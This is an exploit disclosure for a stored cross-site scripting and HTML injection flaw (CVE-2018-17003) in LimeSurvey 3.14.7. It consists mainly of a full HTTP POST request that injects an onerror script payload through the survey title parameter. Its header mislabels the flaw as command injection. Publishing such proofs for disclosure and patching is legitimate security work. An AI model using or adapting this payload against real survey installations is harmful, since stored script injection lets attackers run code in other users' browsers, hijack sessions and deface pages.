# Exploit Title: LimeSurvey 3.14.7 - HTML Injection and Stored XSS # Date: 2018-09-12 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://www.limesurvey.org/ # Software Link : https://github.com/LimeSurvey/LimeSurvey # Software : LimeSurvey 3.14.7 # Product Version: 3.14.7 # Vulernability Type : Command Injection # Vulenrability : HTML Injection and Stored XSS # CVE : CVE-2018-17003 In LimeSurvey 3.14.7, HTML Injection and Stored XSS have been discovered in the appendix via the surveyls_title parameter to /index.php?r=admin/survey/sa/insert. # HTTP Request Header : POST /index.php?r=admin/survey/sa/insert HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/index.php?r=admin/survey/sa/newsurvey Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1171 Cookie: PHPSESSID=6o9og816dj2mjcupb6fvj09ob5; YII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D Connection: close YII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D&surveyls_title=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E&language=en&createsample=0&description=&url=&urldescrip=&dateformat=3&numberformat_en=0&welcome=&endtext=&owner_id=1&admin=Administrator&adminemail=test%40domain.test&bounce_email=test%40domain.test&faxto=&gsid=23&format=G&template=fruity&navigationdelay=0&questionindex=0&showgroupinfo=B&showqnumcode=B&shownoanswer=N&showxquestions=0&showwelcome=0&showwelcome=1&allowprev=0&nokeyboard=0&showprogress=0&showprogress=1&printanswers=0&publicstatistics=0&publicgraphs=0&autoredirect=0&startdate=&expires=&listpublic=0&usecookie=0&usecaptcha_surveyaccess=0&usecaptcha_registration=0&usecaptcha_saveandload=0&datestamp=0&ipaddr=0&refurl=0&savetimings=0&assessments=0&allowsave=0&allowsave=1&emailnotificationto=&emailresponseto=&googleanalyticsapikeysetting=N&googleanalyticsstyle=0&tokenlength=15&anonymized=0&tokenanswerspersistence=0&alloweditaftercompletion=0&allowregister=0&htmlemail=0&htmlemail=1&sendconfirmation=0&sendconfirmation=1&saveandclose=1